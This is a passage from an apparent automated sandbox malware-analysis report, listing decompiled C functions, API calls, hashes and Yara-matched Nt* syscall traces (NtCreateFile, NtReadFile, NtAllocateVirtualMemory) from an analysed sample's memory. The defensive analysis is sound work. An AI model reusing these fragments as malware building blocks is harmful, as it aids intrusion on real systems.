                            					_v12 = E008B1000(_v16, _a4);
                            					_t22 = RegCloseKey(_v16);
                            					if(_v12 != 0) {
                            						_v8 = E008B1450(_v12);
                            						if(_v8 == 0) {
                            							HeapFree(GetProcessHeap(), 0, _v12);
                            						}
                            						return _v8;
                            					}
                            					0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
                            					0x8b0000(_a4, _t22);
                            					0x8b0000("cannot find registry value %s in %s\n", _t22);
                            					return 0;
                            				}
                            				0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
                            				0x8b0000("cannot open key %s, err=%d\n", _t19);
                            				return 0;
                            			}

                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B1609
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CloseOpen
                            • String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
                            • API String ID: 47109696-3561747105
                            • Opcode ID: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction ID: 56a1e3bfe9471b6b6cbd39db1b112954e74d6aeb04a3b6ac16928930317e271f
                            • Opcode Fuzzy Hash: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction Fuzzy Hash: CD11F97494020CFFDB04FBA8C85AFDEB778FB44701F208158B615EA391EA74AA419B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E008B2E1E(void* __ebx, void* __edi, void* __eflags) {
                            				void* __esi;
                            				void* _t3;
                            				intOrPtr _t6;
                            				long _t14;
                            				long* _t27;
                            
                            				E008B2FCD(_t3);
                            				if(E008B4268() != 0) {
                            					_t6 = E008B3D79(E008B2BAF);
                            					 *0x8c21a8 = _t6;
                            					__eflags = _t6 - 0xffffffff;
                            					if(_t6 == 0xffffffff) {
                            						goto L1;
                            					} else {
                            						_t27 = E008B42EE(1, 0x3bc);
                            						__eflags = _t27;
                            						if(_t27 == 0) {
                            							L6:
                            							E008B2E94();
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							__eflags = E008B3DD5( *0x8c21a8, _t27);
                            							if(__eflags == 0) {
                            								goto L6;
                            							} else {
                            								_push(0);
                            								_push(_t27);
                            								E008B2D6B(__ebx, __edi, _t27, __eflags);
                            								_t14 = GetCurrentThreadId();
                            								_t27[1] = _t27[1] | 0xffffffff;
                            								 *_t27 = _t14;
                            								__eflags = 1;
                            								return 1;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E008B2E94();
                            					return 0;
                            				}
                            			}









                            APIs
                            • __init_pointers.LIBCMT ref: 008B2E1E
                              • Part of subcall function 008B2FCD: EncodePointer.KERNEL32(00000000,?,008B2E23,008B28F2,008C10E8,00000014), ref: 008B2FD0
                              • Part of subcall function 008B2FCD: __initp_misc_winsig.LIBCMT ref: 008B2FEB
                              • Part of subcall function 008B2FCD: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B3E6C
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B3E80
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B3E93
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B3EA6
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B3EB9
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B3ECC
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B3EDF
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B3EF2
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B3F05
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B3F18
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B3F2B
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B3F3E
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B3F51
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B3F64
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B3F77
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B3F8A
                            • __mtinitlocks.LIBCMT ref: 008B2E23
                            • __mtterm.LIBCMT ref: 008B2E2C
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B4182
                              • Part of subcall function 008B2E94: _free.LIBCMT ref: 008B4189
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(008C21F8,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B41AB
                            • __calloc_crt.LIBCMT ref: 008B2E51
                            • __initptd.LIBCMT ref: 008B2E73
                            • GetCurrentThreadId.KERNEL32 ref: 008B2E7A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction ID: 09fe444c1aebb2a8687c7674bbef77b9404be5afba650a76ccdb69acaa45b875
                            • Opcode Fuzzy Hash: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction Fuzzy Hash: 45F06D3251961269E23876B97C036CB3B90FF01731B25066AF4A0D93D7EE20D8428162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B1000(void* _a4, short* _a8) {
                            				void* _v8;
                            				long _v12;
                            				unsigned int _v16;
                            				int _v20;
                            				int _v24;
                            
                            				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
                            				if(_v12 == 0) {
                            					_v16 = _v20 + 4;
                            					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
                            					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
                            					if(_v12 == 0) {
                            						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
                            						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
                            						return _v8;
                            					}
                            					HeapFree(GetProcessHeap(), 0, _v8);
                            					return 0;
                            				}
                            				return 0;
                            			}









                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008B101A
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B103C
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1043
                            • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 008B1062
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1077
                            • HeapFree.KERNEL32(00000000), ref: 008B107E
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$ProcessQueryValue$AllocFree
                            • String ID:
                            • API String ID: 1095795037-0
                            • Opcode ID: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction ID: c82e3efd7b83f8e584ea1e2c8a59bc8ad1aacf441dc26026e660beaa5907b78e
                            • Opcode Fuzzy Hash: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction Fuzzy Hash: 0B21EA75A14608FFDB04EFE8D959FAEB7B8FF48300F108559E606DB290D6309A46CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E008B2EB1(void* __ecx, intOrPtr _a4) {
                            				struct HINSTANCE__* _v8;
                            				_Unknown_base(*)()* _t4;
                            
                            				_t4 =  &_v8;
                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                            				if(_t4 != 0) {
                            					_t4 = GetProcAddress(_v8, "CorExitProcess");
                            					if(_t4 != 0) {
                            						return  *_t4(_a4);
                            					}
                            				}
                            				return _t4;
                            			}






                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008B2EF0,00000000,?,008B6374,000000FF,0000001E,00000000,00000000,00000000,?,008B434C), ref: 008B2EC0
                            • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 008B2ED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 1646373207-1276376045
                            • Opcode ID: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction ID: 17c6bd8c73dd649e14282f36a3475105b85eb038516799d2c43be7428d088892
                            • Opcode Fuzzy Hash: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction Fuzzy Hash: 7CD01231240308BBDF50ABA2DC05FAE7BACFB04741F000165BD18D4351FA61DE519661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B853A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				intOrPtr _v12;
                            				int _v20;
                            				int _t35;
                            				int _t38;
                            				intOrPtr* _t44;
                            				int _t47;
                            				short* _t49;
                            				intOrPtr _t50;
                            				intOrPtr _t54;
                            				int _t55;
                            				int _t59;
                            				char* _t62;
                            
                            				_t62 = _a8;
                            				if(_t62 == 0) {
                            					L5:
                            					return 0;
                            				}
                            				_t50 = _a12;
                            				if(_t50 == 0) {
                            					goto L5;
                            				}
                            				if( *_t62 != 0) {
                            					E008B473F( &_v20, _a16);
                            					_t35 = _v20;
                            					__eflags =  *(_t35 + 0xa8);
                            					if( *(_t35 + 0xa8) != 0) {
                            						_t38 = E008B847C( *_t62 & 0x000000ff,  &_v20);
                            						__eflags = _t38;
                            						if(_t38 == 0) {
                            							__eflags = _a4;
                            							_t59 = 1;
                            							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                            							if(__eflags != 0) {
                            								L21:
                            								__eflags = _v8;
                            								if(_v8 != 0) {
                            									_t54 = _v12;
                            									_t31 = _t54 + 0x70;
                            									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                            									__eflags =  *_t31;
                            								}
                            								return _t59;
                            							}
                            							L20:
                            							_t44 = E008B5065(__eflags);
                            							_t59 = _t59 | 0xffffffff;
                            							__eflags = _t59;
                            							 *_t44 = 0x2a;
                            							goto L21;
                            						}
                            						_t59 = _v20;
                            						__eflags =  *(_t59 + 0x74) - 1;
                            						if( *(_t59 + 0x74) <= 1) {
                            							L15:
                            							__eflags = _t50 -  *(_t59 + 0x74);
                            							L16:
                            							if(__eflags < 0) {
                            								goto L20;
                            							}
                            							__eflags = _t62[1];
                            							if(__eflags == 0) {
                            								goto L20;
                            							}
                            							L18:
                            							_t59 =  *(_t59 + 0x74);
                            							goto L21;
                            						}
                            						__eflags = _t50 -  *(_t59 + 0x74);
                            						if(__eflags < 0) {
                            							goto L16;
                            						}
                            						__eflags = _a4;
                            						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                            						_t59 = _v20;
                            						__eflags = _t47;
                            						if(_t47 != 0) {
                            							goto L18;
                            						}
                            						goto L15;
                            					}
                            					_t55 = _a4;
                            					__eflags = _t55;
                            					if(_t55 != 0) {
                            						 *_t55 =  *_t62 & 0x000000ff;
                            					}
                            					_t59 = 1;
                            					goto L21;
                            				}
                            				_t49 = _a4;
                            				if(_t49 != 0) {
                            					 *_t49 = 0;
                            				}
                            				goto L5;
                            			}

















                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B8570
                            • __isleadbyte_l.LIBCMT ref: 008B859E
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B85CC
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B8602
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction ID: 0a565f81a7d384f021c554f9ac702528e0ac5936fcd48a0797760e4dba859378
                            • Opcode Fuzzy Hash: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction Fuzzy Hash: D4318D3160024AEFDB319F69C849BEB7BA9FF41311F154529E865C72A1EB30D891DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E008B63D9(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                            				void* _t7;
                            				long _t8;
                            				intOrPtr* _t9;
                            				intOrPtr* _t12;
                            				long _t20;
                            				long _t31;
                            
                            				if(_a4 != 0) {
                            					_t31 = _a8;
                            					__eflags = _t31;
                            					if(_t31 != 0) {
                            						_push(__ebx);
                            						while(1) {
                            							__eflags = _t31 - 0xffffffe0;
                            							if(_t31 > 0xffffffe0) {
                            								break;
                            							}
                            							__eflags = _t31;
                            							if(_t31 == 0) {
                            								_t31 = _t31 + 1;
                            								__eflags = _t31;
                            							}
                            							_t7 = HeapReAlloc( *0x8c329c, 0, _a4, _t31);
                            							_t20 = _t7;
                            							__eflags = _t20;
                            							if(_t20 != 0) {
                            								L17:
                            								_t8 = _t20;
                            							} else {
                            								__eflags =  *0x8c40d0 - _t7;
                            								if(__eflags == 0) {
                            									_t9 = E008B5065(__eflags);
                            									 *_t9 = E008B5078(GetLastError());
                            									goto L17;
                            								} else {
                            									__eflags = E008B5360(_t7, _t31);
                            									if(__eflags == 0) {
                            										_t12 = E008B5065(__eflags);
                            										 *_t12 = E008B5078(GetLastError());
                            										L12:
                            										_t8 = 0;
                            										__eflags = 0;
                            									} else {
                            										continue;
                            									}
                            								}
                            							}
                            							goto L14;
                            						}
                            						E008B5360(_t6, _t31);
                            						 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
                            						goto L12;
                            					} else {
                            						E008B42B6(_a4);
                            						_t8 = 0;
                            					}
                            					L14:
                            					return _t8;
                            				} else {
                            					return E008B6347(__ebx, __edx, __edi, _a8);
                            				}
                            			}










                            APIs
                            • _free.LIBCMT ref: 008B63F8
                              • Part of subcall function 008B6347: __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B6347: __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B6347: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID:
                            • API String ID: 1080816511-0
                            • Opcode ID: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction ID: 5ed14fd9dd8a0b4bc5c1a59fdb5e1a04899b06c7bdf25c33e0311d1cce1d102a
                            • Opcode Fuzzy Hash: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction Fuzzy Hash: 4311AC31504E15ABCB213F78AC457DA37D4FF04764F144529F909D6351FF39C861869A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B9DAD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                            				intOrPtr _t25;
                            				void* _t26;
                            
                            				_t25 = _a16;
                            				if(_t25 == 0x65 || _t25 == 0x45) {
                            					_t26 = E008BA2FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            					goto L9;
                            				} else {
                            					_t35 = _t25 - 0x66;
                            					if(_t25 != 0x66) {
                            						__eflags = _t25 - 0x61;
                            						if(_t25 == 0x61) {
                            							L7:
                            							_t26 = E008B9E33(_a4, _a8, _a12, _a20, _a24, _a28);
                            						} else {
                            							__eflags = _t25 - 0x41;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t26 = E008BA579(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            							}
                            						}
                            						L9:
                            						return _t26;
                            					} else {
                            						return E008BA4B8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                            					}
                            				}
                            			}






                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: d2fc2d763adaaa50faf8328ef8561807945ae7850971290da7cdaaacfb6c84bf
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 8501493604414EBBCF169E88CC42CEE3F26FB18354B588519FB5899231D377C9B1AB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E0137FDDA(intOrPtr* __edx, intOrPtr _a4) {
                            				void* _t7;
                            				intOrPtr _t9;
                            				intOrPtr _t10;
                            				intOrPtr* _t12;
                            				intOrPtr* _t13;
                            				intOrPtr _t14;
                            				intOrPtr* _t15;
                            
                            				_t13 = __edx;
                            				_push(_a4);
                            				_t14 =  *[fs:0x18];
                            				_t15 = _t12;
                            				_t7 = E0132CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                            				_push(_t13);
                            				E01375720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                            				_t9 =  *_t15;
                            				if(_t9 == 0xffffffff) {
                            					_t10 = 0;
                            				} else {
                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                            				}
                            				_push(_t10);
                            				_push(_t15);
                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                            				return E01375720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                            			}











                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0137FDFA
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0137FE2B
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0137FE01
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: 704ebaa0b135f025891f91bb521a30fd713c176600800318c88a88b9469a8bfd
                            • Instruction ID: c8eb4b7cbd70e4e5268160496b04673c246bc40d0dc08e18a1398f350cd12715
                            • Opcode Fuzzy Hash: 704ebaa0b135f025891f91bb521a30fd713c176600800318c88a88b9469a8bfd
                            • Instruction Fuzzy Hash: BEF0F632200641BFE6341A59DC02F23BF6EEB44B34F240314F628565D1EA62F82097F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD821D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: fa86185a81c49599624fefefa169eeaeca1e005109dbc01ead65369f57900bc6
                            • Instruction ID: 60a008c12a5b9d788f4a498a56919bc22c7117b0ddc04dd9973032978ef02ee6
                            • Opcode Fuzzy Hash: fa86185a81c49599624fefefa169eeaeca1e005109dbc01ead65369f57900bc6
                            • Instruction Fuzzy Hash: 69110AB2600208AFCB14DF88DC85EEB37ADEF8C750F158549BA1D97241DA30E8158BB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD821D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction ID: fe9d4d36b5dcfa17b843f8a78a1dce1e4b24f9dbf481327ce0706d20ac6aaa0a
                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction Fuzzy Hash: 5EF0B2B2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: f96a8fbfa192e6e6be0b631fb0bda634d73357527ee07648345d28b17ed3389d
                            • Instruction ID: c8297b320a2f990e8456a5c1d55954af1a5b4b52fd9bcbd77d8c6a5342054568
                            • Opcode Fuzzy Hash: f96a8fbfa192e6e6be0b631fb0bda634d73357527ee07648345d28b17ed3389d
                            • Instruction Fuzzy Hash: 9FF030722012047FDB14DF98DC81DE777A9EF88710F048559FA1C8B281C630E91187F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 690dcdf0c06d0e6e600ed5ca2d3927cc4484ad4c9eff41793375084e5323805e
                            • Instruction ID: 15e19d383a9aea6effc54cf78a356998f6f7a0db55af09b95e162226e759c378
                            • Opcode Fuzzy Hash: 690dcdf0c06d0e6e600ed5ca2d3927cc4484ad4c9eff41793375084e5323805e
                            • Instruction Fuzzy Hash: D8F0E7B2200208ABCB14DF89DC81EEB77A9EF8C714F118249BA1D97291D630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction ID: dad1284e13de33a34030dfc945756b6af8ed21681c5726590ba1831c00e52eb3
                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction Fuzzy Hash: 2AF0A4B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BA1D97241DA30E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DC2D11,00002000,00003000,00000004), ref: 00DD83E9
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction ID: adcba28046dadc3d7f92487766407bef4c47a609800772a0d648b1d1f88cc2f2
                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction Fuzzy Hash: 43F015B2200208AFCB14DF89CC81EAB77ADEF88750F118149BE0897281C630F810CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DC2D11,00002000,00003000,00000004), ref: 00DD83E9
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
